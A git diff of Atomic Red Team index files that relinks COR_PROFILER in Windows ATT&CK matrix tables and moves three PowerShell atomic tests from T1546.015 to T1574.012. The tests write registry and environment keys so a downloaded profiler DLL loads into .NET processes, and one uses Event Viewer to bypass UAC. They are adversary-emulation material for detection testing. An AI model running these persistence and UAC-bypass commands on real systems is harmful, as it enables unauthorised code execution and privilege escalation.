+|  | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 32f428cf..7d17759c 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -9,15 +9,15 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2d4744b5..a799a220 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1538,7 +1538,132 @@ privilege-escalation:
       - Jesse Brown, Red Canary
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
   T1546.001:
     technique:
       created: '2020-01-24T13:40:47.282Z'
@@ -1777,129 +1902,7 @@ privilege-escalation:
       - Elastic
       x_mitre_platforms:
       - Windows
-      identifier: T1546.015
-    atomic_tests:
-    - name: COM Hijack Leveraging user scope COR_PROFILER
-      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
-      description: |
-        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-        the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-          START MMC.EXE EVENTVWR.MSC
-        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
-          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-          -Force -ErrorAction Ignore | Out-Null\n"
-        name: powershell
-    - name: COM Hijack Leveraging System Scope COR_PROFILER
-      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
-      description: |
-        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
